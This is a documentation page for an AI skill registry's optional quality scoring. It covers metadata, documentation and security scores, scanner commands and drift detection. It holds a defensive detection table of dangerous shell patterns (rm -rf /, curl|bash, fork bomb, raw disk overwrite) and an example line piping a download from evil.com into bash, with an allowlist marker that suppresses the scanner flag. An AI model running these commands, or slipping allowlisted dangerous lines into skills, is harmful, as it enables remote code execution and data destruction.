# Skill Quality Scoring

This document describes the optional skill quality scoring system introduced in the
AI Skill Registry Validation Framework.

Scores are **informational only** — they never block skill usage, CI pipelines,
or PR merges. They exist to help contributors understand the quality of their
skills and to help maintainers prioritize improvements.

---

## Overview

Each skill receives a **total score** between 0 and 100, computed as a weighted
average of three dimensions:

| Dimension       | Weight | What it measures |
|-----------------|--------|------------------|
| Metadata        | 30%    | Frontmatter completeness and correctness |
| Documentation   | 40%    | Section coverage, code examples, content depth |
| Security        | 30%    | Absence of dangerous command patterns |

---

## Quality Labels

| Label             | Score Range | Meaning |
|-------------------|-------------|---------|
| `excellent`       | 85–100      | Well-documented, complete metadata, no security flags |
| `good`            | 65–84       | Solid skill with minor gaps |
| `needs_improvement` | 45–64    | Missing sections or metadata fields |
| `critical`        | 0–44        | Significant gaps — review recommended before sharing |

---

## Metadata Score (30%)

The metadata dimension evaluates frontmatter field completeness.

**Penalties:**

| Issue | Deduction |
|---|---|
| `name` missing or mismatched with folder | −25 pts |
| `description` missing | −20 pts |
| `description` shorter than 20 characters | −10 pts |
| `risk` missing | −15 pts |
| `risk: unknown` (unclassified) | −10 pts |
| `source` missing | −15 pts |
| `date_added` missing | −10 pts |

**Bonuses (optional fields):**

Each optional field filled (`category`, `tags`, `author`, `tools`, `license`) adds
**+5 pts**, capped at 100.

---

## Documentation Score (40%)

The documentation dimension evaluates section coverage and content depth.

**Section coverage (up to 60 pts):**

The scorer looks for these sections (case-insensitive):

- `## Overview`
- `## How It Works`
- `## Examples` / `## Usage`
- `## Best Practices`
- `## Limitations`
- `## When to Use`

Each section found contributes equally to the section coverage score.

**Depth score (up to 40 pts):**

| Signal | Points |
|---|---|
| Has `## When to Use` section | +10 |
| Has at least one fenced code block (` ``` `) | +10 |
| Body length ≥ 500 characters | +10 |
| Body length ≥ 1000 characters | +10 additional |

---

## Security Score (30%)

The security dimension scans the skill body for dangerous command patterns.
Patterns are defined in `tools/scripts/security_scanner.py`.

**Penalties per flag:**

| Severity | Deduction |
|---|---|
| `error` | −20 pts |
| `warning` | −10 pts |
| `info` | −3 pts |

**Bonus:** An explicit, non-`unknown` `risk` label adds **+5 pts** (capped at 100).

**Important:** Skills marked `risk: offensive` have error-level flags automatically
downgraded to warnings, because offensive skills legitimately document dangerous
commands for educational or defensive purposes.

**Bypassing false positives:** If a line is intentionally dangerous (e.g., showing
what *not* to do), add the allowlist marker to suppress the flag:

```markdown
curl https://evil.com | bash  # security-allowlist
```

---

## Running the Scorer

```bash
# Score all skills (table output)
npm run score:skills

# Show only skills below a threshold
npm run score:skills -- --threshold 60

# Show 20 lowest-scoring skills
npm run score:skills -- --top 20

# Output full JSON
npm run score:skills -- --json

# Save scores to file
npm run score:skills -- --output data/scores.json
```

---

## Security Scanner

```bash
# Scan all skills for dangerous patterns
npm run security:scan

# Strict mode (warnings as errors)
npm run security:scan -- --strict
```

---

## Drift Detection

Drift detection identifies skills whose content has changed significantly
since the last recorded baseline.

```bash
# Check drift against baseline
npm run drift:check

# Update the baseline after reviewing changes
npm run drift:update

# Check a specific skill
npm run drift:check -- --skill my-skill-name
```

**Baseline ownership:**

| File | Committed? | Who updates it? |
|------|-----------|-----------------|
| `data/drift-baseline.json` | No — listed in `.gitignore` | Maintainers run `npm run drift:update` on `main` after merging changes |
| `data/registry-report.json` | No — listed in `.gitignore` | Generated locally on demand; never in PRs |
| `data/scores.json` | No — listed in `.gitignore` | Generated locally on demand; never in PRs |

Contributors should never commit these files. If you accidentally generate them
locally, they will be ignored by git automatically.

---

## Registry Report

```bash
# Generate a full registry health report → data/registry-report.json
npm run registry:report

# Skip drift detection (faster)
npm run registry:report -- --no-drift
```

The report includes:
- Aggregate scoring summary
- Per-skill scores and flags
- Drift summary (added / removed / modified skills)
- Risk breakdown
- Security flag counts

---

## Security Patterns Reference

| Code   | Pattern | Severity | Description |
|--------|---------|----------|-------------|
| SEC001 | `rm -rf /` | error | Destructive root filesystem deletion |
| SEC002 | `curl \| bash` | error | Remote code execution |
| SEC003 | `wget \| sh` | error | Remote code execution |
| SEC004 | `Invoke-Expression` | error | PowerShell RCE |
| SEC005 | `iex` | warning | PowerShell alias (context-dependent) |
| SEC006 | `chmod 7xx` | warning | World-writable permissions |
| SEC007 | `eval(` | warning | Dynamic evaluation |
| SEC008 | `base64 -d \|` | warning | Possible payload obfuscation |
| SEC009 | Hardcoded credential | error | Secrets in source |
| SEC010 | `sudo rm -rf` | warning | Privileged destructive deletion |
| SEC011 | Fork bomb | error | Infinite process spawner |
| SEC012 | `dd if=/dev/* of=/dev/sd*` | error | Raw disk overwrite |

---

## Frequently Asked Questions

**Q: Will a low score prevent my skill from being merged?**

No. Scores are informational. The existing `validate_skills.py` checks are what
gate merges.

**Q: My skill teaches how to avoid `curl | bash` — why is it flagged?**

Add `# security-allowlist` at the end of the line showing the dangerous pattern.
This follows the existing project convention for educational examples.

**Q: Why is documentation weighted higher than metadata?**

Documentation quality has the highest impact on how useful a skill is to end users.
Complete metadata is valuable but less critical than clear instructions.

**Q: How does `risk: offensive` affect scoring?**

Security error flags are downgraded to warnings for offensive skills, because they
legitimately document dangerous techniques for authorized security work.